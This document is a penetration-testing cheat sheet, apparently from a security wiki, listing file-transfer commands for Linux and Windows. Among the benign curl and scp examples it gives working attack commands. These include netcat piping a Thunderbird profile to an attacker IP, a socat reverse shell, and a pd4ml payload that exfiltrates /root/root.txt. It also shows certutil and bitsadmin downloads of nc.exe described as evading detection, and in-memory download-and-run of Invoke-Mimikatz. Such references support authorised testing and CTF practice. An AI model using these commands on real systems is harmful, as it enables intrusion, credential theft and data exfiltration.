File Transfer
Listeners and binaries
curl
File Upload
curl -T example.txt https://example.com/upload
File Upload + POST
curl -T example.txt -X POST https://example.com/upload
File upload + Authentication
curl -u user:pass -T example.txt https://example.com/upload
File Upload + Token Authentication
curl -u :YOUR_TOKEN -T example.txt https://example.com/upload
File Upload + Custom Header
curl -H "Authorization: Bearer YOUR_TOKEN" -T example.txt https://example.com/upload
File Upload + Multiple Custom Headers
curl -H "Authorization: Bearer YOUR_TOKEN" -H "Content-Type: application/json" -T example.txt https://example.com/upload
Multiple File Uploads
curl -T file1.txt -T file2.txt https://example.com/upload
File Upload as Form submission
curl -F "file=@example.txt" https://example.com/upload
File Upload + Additional Query Parameters
curl -T example.txt "https://example.com/upload?user=alice×tamp=2024"
File Upload + Redirect
curl -L -T example.txt https://example.com/upload
File Upload + Retry
curl --retry 5 -T example.txt https://example.com/upload
File Upload to FTP server
curl -T example.txt ftp://ftp.example.com/upload/
File Upload + Custom HTTP Method
curl -X PATCH -T example.txt https://example.com/upload
File transfer on compromised Apache
servers
Copy a file into Apache Web Directory
With the right permissions, you can copy the file to
/var/www/html
so it can be access from the URLhttp://<server-ip>/file.txt
.
cp archivo.txt /var/www/html
Give ownership to the web user
sudo chown www-data:www-data /var/www/html/archivo.txt
Set the file to be read by everyone
sudo chmod 644 /var/www/html/archivo.txt
Uploading via Apache (web interface)
Ensure the appropriate
upload_max_filesize
andpost_max_size
directives are set in thephp.ini
file.Normally is located here
/etc/php/7.x/apache2/php.ini
upload_max_filesize = 50M
post_max_size = 50M
Use pd4ml.jar
to exfill files attaching then to the PDF
POC
<html>
<pd4ml:attachment src="/root/root.txt"/>
</html>
With PHP
code execution
One liner
php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
Secure Copy Protocol scp
From local machine to remote host
scp localfile username@remotehost:/path/to/destination/
From remote host to local machine
scp username@remotehost:/path/to/remotefile /local/path/
Specific Port
scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1
With key
scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/
From local to Apache Server
scp archivo.txt user@remote-server:/var/www/html/
Using Netcat
Host
nc -lvp <Local_PORT> > file
Client
nc <Target_IP> <port> < file
With cat
cat <file> | nc Target_IP 443
Use tar for directories
tar -cf - .thunderbird | nc 10.10.16.10 4445
Using Socat
Listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
Target Machine
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Windows
curl
curl http://ip/file -o <output>
wget
wget http://ip/file -OutFile <output>
certutil
First, start a python web server
python3 -m http.server 443
Then
certutil.exe -f -urlcache -split http://<IP>/<file>
Sneaky Version
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe
Invoke-WebRequest
First, start a python web-server
python3 -m http.server 443
Then
IWR -uri http://<ip>/<file> -OutFile <file_name>
Uses Chrome User Agent
Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"
Upload a file
Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
Impacket
First, create a SMB share folder
impacket-smbserver <share_name> <file_path> -smb2support
Then, copy the files
copy \\<ip>\share\<file> <destination_path>
System.Net.WebClient
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')
Bitsadmin
Download files stealthily and evade detection, as bitsadmin
is a native tool and might be overlooked by some security solutions.
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
Modern Version
Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exe
In-memory execution
Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')
Last updated